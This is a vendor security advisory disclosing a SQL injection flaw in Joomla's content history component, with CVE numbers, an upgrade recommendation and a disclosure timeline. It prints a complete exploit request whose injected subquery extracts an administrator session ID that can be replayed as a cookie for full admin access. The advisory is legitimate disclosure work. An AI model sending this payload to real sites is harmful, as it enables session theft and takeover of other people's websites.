Trustwave SpiderLabs Security Advisory TWSL2015-021: Joomla SQL Injection Vulnerability Published: 10/22/2015 Version: 1.0 Vendor: Joomla (https://www.joomla.org/) Product: Joomla! Content Management System (CMS) Product description: Content Management System Finding: SQL Injection Vulnerability Credit: Asaf Orpani of Trustwave CVE: CVE-2015-7297, CVE-2015-7857, CVE-2015-7858 An SQL Injection vulnerability exists in the file “/administrator/components/com_contenthistory/models/history.php” a core module installed as part of a default Joomla installation. The following HTTP request allows an attacker to exploit the SQL injection vulnerability to return an administrative session id from Joomla: GET index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=75&type_id=1 &list[select]= (select 1 FROM(select count(*),concat((select (select concat(session_id)) FROM jml_session LIMIT 0,1),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a) This admin session id can then be used as a part of a cookie in order to gain full administrative privileges to the Joomla site. Remediation Steps: Trustwave recommends all users to upgrade to Joomla 3.4.5. Users that cannot patch or upgrade are recommended to deploy virtual patching technologies like web application firewall that can block the exploit. Revision History: 10/15/2015 - Vulnerability disclosed to vendor 10/22/2015 - Patch released by vendor 10/22/2015 - Advisory published References 1. https://www.trustwave.com/Resources/SpiderLabs-Blog/Joomla-SQL-Injection-Vulnerability-Exploit-Results-in-Full-Administrative-Access/ 2. https://www.joomla.org/announcements/release-news/5634-joomla-3-4-5-released.html About Trustwave: Trustwave helps businesses fight cybercrime, protect data and reduce security risks. With cloud and managed security services, integrated technologies and a team of security experts, ethical hackers and researchers, Trustwave enables businesses to transform the way they manage their information security and compliance programs while safely embracing business imperatives including big data, BYOD and social media. More than 2.5 million businesses are enrolled in the Trustwave TrustKeeper® cloud platform, through which Trustwave delivers automated, efficient and cost-effective data protection, risk management and threat intelligence. Trustwave is a privately held company, headquartered in Chicago, with customers in 96 countries. For more information about Trustwave, visit www.trustwave.com. About Trustwave SpiderLabs: SpiderLabs(R) is the advanced security team at Trustwave focused on application security, incident response, penetration testing, physical security and security research. The team has performed over a thousand incident investigations, thousands of penetration tests and hundreds of application security tests globally. In addition, the SpiderLabs Research team provides intelligence through bleeding-edge research and proof of concept tool development to enhance Trustwave's products and services. https://www.trustwave.com/spiderlabs Disclaimer: The information provided in this advisory is provided "as is" without warranty of any kind. Trustwave disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Trustwave or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Trustwave or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.